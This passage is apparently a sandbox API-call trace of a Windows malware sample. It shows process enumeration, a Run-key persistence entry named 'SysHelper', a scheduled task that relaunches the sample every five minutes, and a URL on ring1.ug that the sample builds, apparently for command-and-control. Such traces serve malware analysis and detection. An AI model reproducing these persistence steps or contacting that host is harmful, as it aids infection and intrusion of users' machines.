bInheritHandle=0, dwProcessId=0x59c) returned 0x5a4 [0040.193] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.194] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10c0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="audi.exe") returned 0x8 [0040.194] CloseHandle (hObject=0x5a4) returned 1 [0040.194] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6e4) returned 0x5a4 [0040.194] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.195] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x10e0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="eliminategeographylyrics.exe") returned 0x1c [0040.195] CloseHandle (hObject=0x5a4) returned 1 [0040.195] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x440) returned 0x5a4 [0040.195] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.196] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x8b0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="bay-antiques.exe") returned 0x10 [0040.196] CloseHandle (hObject=0x5a4) returned 1 [0040.196] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x660) returned 0x5a4 [0040.196] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.197] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x13d0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="geneva minimal.exe") returned 0x12 [0040.198] CloseHandle (hObject=0x5a4) returned 1 [0040.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x5a4 [0040.198] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.198] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x2c0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="floating-illustrations.exe") returned 0x1a [0040.199] CloseHandle (hObject=0x5a4) returned 1 [0040.199] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x604) returned 0x5a4 [0040.199] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.200] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1280000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="bizrate.exe") returned 0xb [0040.200] CloseHandle (hObject=0x5a4) returned 1 [0040.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x328) returned 0x5a4 [0040.200] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.201] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xd0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="tourist.exe") returned 0xb [0040.201] CloseHandle (hObject=0x5a4) returned 1 [0040.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x5a4 [0040.201] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.202] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x380000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="blanket.exe") returned 0xb [0040.202] CloseHandle (hObject=0x5a4) returned 1 [0040.202] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2ac) returned 0x5a4 [0040.202] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.203] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1200000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="pgp locked former.exe") returned 0x15 [0040.203] CloseHandle (hObject=0x5a4) returned 1 [0040.203] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x714) returned 0x5a4 [0040.203] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.204] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x13a0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="drum_childrens_choose.exe") returned 0x19 [0040.204] CloseHandle (hObject=0x5a4) returned 1 [0040.204] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x5a4 [0040.204] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.205] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xa20000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="cameras_efficient_about.exe") returned 0x1b [0040.205] CloseHandle (hObject=0x5a4) returned 1 [0040.205] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x774) returned 0x5a4 [0040.205] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.206] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x230000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="animated_min_rich.exe") returned 0x15 [0040.206] CloseHandle (hObject=0x5a4) returned 1 [0040.206] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7a8) returned 0x5a4 [0040.206] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.207] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1190000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="twenty-error.exe") returned 0x10 [0040.208] CloseHandle (hObject=0x5a4) returned 1 [0040.208] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x5a4 [0040.208] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.209] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xb0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="proceeds.exe") returned 0xc [0040.209] CloseHandle (hObject=0x5a4) returned 1 [0040.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x5a4 [0040.209] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.210] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x11e0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="violations.exe") returned 0xe [0040.210] CloseHandle (hObject=0x5a4) returned 1 [0040.210] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7e8) returned 0x5a4 [0040.210] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.211] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x1350000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="way.exe") returned 0x7 [0040.211] CloseHandle (hObject=0x5a4) returned 1 [0040.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0040.211] CloseHandle (hObject=0x0) returned 0 [0040.211] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x5a4 [0040.211] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.212] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="penelop0611_2019-11-06_10-30.exe_.exe") returned 0x25 [0040.212] CloseHandle (hObject=0x5a4) returned 1 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x68a740 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3212370 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32475a8 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3232680 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32328e8 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3232b50 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3232db8 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3233020 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3233288 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32334f0 [0040.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3233758 [0040.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d870 | out: phkResult=0x18d870*=0x5a4) returned 0x0 [0040.225] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d86c, lpData=0x18bf98, lpcbData=0x18d850*=0x400 | out: lpType=0x18d86c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe\" --AutoStart", lpcbData=0x18d850*=0x10a) returned 0x0 [0040.225] RegCloseKey (hKey=0x5a4) returned 0x0 [0040.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x6b9888 [0040.225] lstrlenA (lpString="\" --AutoStart") returned 13 [0040.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x69ddb0 [0040.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b9888 | out: hHeap=0x660000) returned 1 [0040.225] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned 1 [0040.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x32450a0 [0040.225] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ddb0 | out: hHeap=0x660000) returned 1 [0040.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x69ddb0 [0040.225] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x31fed60 [0040.225] CoInitialize (pvReserved=0x0) returned 0x0 [0040.472] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0040.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf0) returned 0x32125d8 [0040.473] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d85c | out: ppv=0x18d85c*=0x29b0ad8) returned 0x0 [0040.478] TaskScheduler:ITaskService:Connect (This=0x29b0ad8, serverName=0x18d2e8*(varType=0x0, wReserved1=0x69, wReserved2=0xdda8, wReserved3=0x69, varVal1=0x77, varVal2=0xf0), user=0x18d2f8*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0xf8), domain=0x18d308*(varType=0x0, wReserved1=0x0, wReserved2=0xf0, wReserved3=0x0, varVal1=0x77, varVal2=0x7), password=0x18d318*(varType=0x0, wReserved1=0x323, wReserved2=0xd804, wReserved3=0x18, varVal1=0x420cab, varVal2=0x660000)) returned 0x0 [0040.516] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x32311d8 [0040.516] TaskScheduler:ITaskService:GetFolder (in: This=0x29b0ad8, Path="\\", ppFolder=0x18d864 | out: ppFolder=0x18d864*=0x29b0b40) returned 0x0 [0040.517] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32311d8 | out: hHeap=0x660000) returned 1 [0040.517] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x32311d8 [0040.517] ITaskFolder:DeleteTask (This=0x29b0b40, Name="Time Trigger Task", flags=0) returned 0x0 [0040.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32311d8 | out: hHeap=0x660000) returned 1 [0040.558] TaskScheduler:ITaskService:NewTask (in: This=0x29b0ad8, flags=0x0, ppDefinition=0x18d868 | out: ppDefinition=0x18d868*=0x29b0b70) returned 0x0 [0040.558] TaskScheduler:IUnknown:Release (This=0x29b0ad8) returned 0x1 [0040.558] ITaskDefinition:get_RegistrationInfo (in: This=0x29b0b70, ppRegistrationInfo=0x18d83c | out: ppRegistrationInfo=0x18d83c*=0x29b0c30) returned 0x0 [0040.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.558] IRegistrationInfo:put_Author (This=0x29b0c30, Author="Author Name") returned 0x0 [0040.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.558] IUnknown:Release (This=0x29b0c30) returned 0x1 [0040.558] ITaskDefinition:get_Principal (in: This=0x29b0b70, ppPrincipal=0x18d844 | out: ppPrincipal=0x18d844*=0x29b0dc0) returned 0x0 [0040.558] IPrincipal:put_LogonType (This=0x29b0dc0, LogonType=3) returned 0x0 [0040.558] IUnknown:Release (This=0x29b0dc0) returned 0x1 [0040.558] ITaskDefinition:get_Settings (in: This=0x29b0b70, ppSettings=0x18d84c | out: ppSettings=0x18d84c*=0x29b0ce0) returned 0x0 [0040.559] ITaskSettings:put_StartWhenAvailable (This=0x29b0ce0, StartWhenAvailable=1) returned 0x0 [0040.559] IUnknown:Release (This=0x29b0ce0) returned 0x1 [0040.559] ITaskSettings:get_IdleSettings (in: This=0x29b0ce0, ppIdleSettings=0x18d830 | out: ppIdleSettings=0x18d830*=0x29b0d50) returned 0x0 [0040.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.559] IIdleSettings:put_WaitTimeout (This=0x29b0d50, WaitTimeout="PT5M") returned 0x0 [0040.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.559] IUnknown:Release (This=0x29b0d50) returned 0x1 [0040.559] ITaskDefinition:get_Triggers (in: This=0x29b0b70, ppTriggers=0x18d82c | out: ppTriggers=0x18d82c*=0x29b0ca0) returned 0x0 [0040.559] ITriggerCollection:Create (in: This=0x29b0ca0, Type=1, ppTrigger=0x18d838 | out: ppTrigger=0x18d838*=0x29b0e20) returned 0x0 [0040.559] IUnknown:Release (This=0x29b0ca0) returned 0x1 [0040.559] IUnknown:QueryInterface (in: This=0x29b0e20, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d854 | out: ppvObject=0x18d854*=0x29b0e20) returned 0x0 [0040.559] IUnknown:Release (This=0x29b0e20) returned 0x2 [0040.559] ITrigger:get_Repetition (in: This=0x29b0e20, ppRepeat=0x18d840 | out: ppRepeat=0x18d840*=0x29b0e70) returned 0x0 [0040.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.559] IRepetitionPattern:put_Interval (This=0x29b0e70, Interval="PT5M") returned 0x0 [0040.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.560] IRepetitionPattern:put_Duration (This=0x29b0e70, Duration="") returned 0x0 [0040.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.560] ITrigger:put_Repetition (This=0x29b0e20, Repetition=0x29b0e70) returned 0x0 [0040.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.560] ITrigger:put_Id (This=0x29b0e20, Id="Trigger1") returned 0x0 [0040.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.560] ITrigger:put_EndBoundary (This=0x29b0e20, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0040.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d314 | out: lpSystemTimeAsFileTime=0x18d314*(dwLowDateTime=0x16e4d850, dwHighDateTime=0x1d5956a)) [0040.566] GetLastError () returned 0x0 [0040.566] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0040.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d27c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d27c) returned 26 [0040.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d27c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d27c) returned 26 [0040.567] GetLastError () returned 0x0 [0040.567] ITrigger:put_StartBoundary (This=0x29b0e20, StartBoundary="2019-11-08T00:01:51") returned 0x0 [0040.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.567] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322b5e0 | out: hHeap=0x660000) returned 1 [0040.567] IUnknown:Release (This=0x29b0e20) returned 0x1 [0040.568] ITaskDefinition:get_Actions (in: This=0x29b0b70, ppActions=0x18d848 | out: ppActions=0x18d848*=0x29b0be8) returned 0x0 [0040.568] IActionCollection:Create (in: This=0x29b0be8, Type=0, ppAction=0x18d834 | out: ppAction=0x18d834*=0x29b0eb8) returned 0x0 [0040.568] IUnknown:Release (This=0x29b0be8) returned 0x1 [0040.568] IUnknown:QueryInterface (in: This=0x29b0eb8, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18d850 | out: ppvObject=0x18d850*=0x29b0eb8) returned 0x0 [0040.568] IUnknown:Release (This=0x29b0eb8) returned 0x2 [0040.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.568] IExecAction:put_Path (This=0x29b0eb8, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f1658be0-4925-4d7c-8e40-cf12d31fe3a1\\penelop0611_2019-11-06_10-30.exe_.exe") returned 0x0 [0040.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.568] IExecAction:put_Arguments (This=0x29b0eb8, Arguments="--Task") returned 0x0 [0040.568] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.568] IUnknown:Release (This=0x29b0eb8) returned 0x1 [0040.568] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x3231208 [0040.568] ITaskFolder:RegisterTaskDefinition (in: This=0x29b0b40, Path="Time Trigger Task", pDefinition=0x29b0b70, flags=6, UserId=0x18d2f0*(varType=0x0, wReserved1=0x323, wReserved2=0xd804, wReserved3=0x18, varVal1=0x420cab, varVal2=0x660000), password=0x18d300*(varType=0x0, wReserved1=0x0, wReserved2=0xf0, wReserved3=0x0, varVal1=0x77, varVal2=0x7), LogonType=3, sddl=0x18d314*(varType=0x8, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1="", varVal2=0xf8), ppTask=0x18d81c | out: ppTask=0x18d81c*=0x29b0f38) returned 0x0 [0040.617] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3231208 | out: hHeap=0x660000) returned 1 [0040.617] TaskScheduler:IUnknown:Release (This=0x29b0b40) returned 0x0 [0040.617] TaskScheduler:IUnknown:Release (This=0x29b0b70) returned 0x0 [0040.617] IUnknown:Release (This=0x29b0f38) returned 0x0 [0040.617] CoUninitialize () [0040.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32125d8 | out: hHeap=0x660000) returned 1 [0040.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31fed60 | out: hHeap=0x660000) returned 1 [0040.618] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69ddb0 | out: hHeap=0x660000) returned 1 [0040.618] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6b5ca0 [0040.618] OpenServiceW (hSCManager=0x6b5ca0, lpServiceName="MYSQL", dwDesiredAccess=0x20) returned 0x0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32164d0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3234850 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32341b0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x322bdb0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x322c018 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x322c280 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x322c4e8 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32384a0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3238708 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3238970 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3238bd8 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3238e40 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32390a8 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3239310 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3239578 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x32397e0 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3239a48 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x31d9098 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x3234418 [0040.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31d9098 | out: hHeap=0x660000) returned 1 [0040.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x110) returned 0x32125d8 [0040.619] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41dbd0, lpParameter=0x3231578, dwCreationFlags=0x0, lpThreadId=0x513258 | out: lpThreadId=0x513258*=0x9d8) returned 0x5b4 [0040.830] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28) returned 0x324e358 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3239cb0 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x3239f18 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323a180 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323a3e8 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323a650 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323a8b8 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323ab20 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323ad88 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323aff0 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25c) returned 0x323b258 [0040.830] lstrlenA (lpString="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned 58 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x6c5810 [0040.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3239cb0, cbMultiByte=-1, lpWideCharStr=0x6c5810, cchWideChar=59 | out: lpWideCharStr="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned 59 [0040.830] lstrcatW (in: lpString1="", lpString2="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.830] lstrlenA (lpString="") returned 0 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbc08 [0040.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3239f18, cbMultiByte=-1, lpWideCharStr=0x31cbc08, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0040.830] lstrcatW (in: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php", lpString2="" | out: lpString1="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php") returned="http://ring1.ug/ASd574yw4ohu5wgiudpen10/374SdjkfSD/get.php" [0040.830] lstrlenA (lpString="") returned 0 [0040.830] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2) returned 0x31cbbd8 [0040.830] MultiByteToWideChar 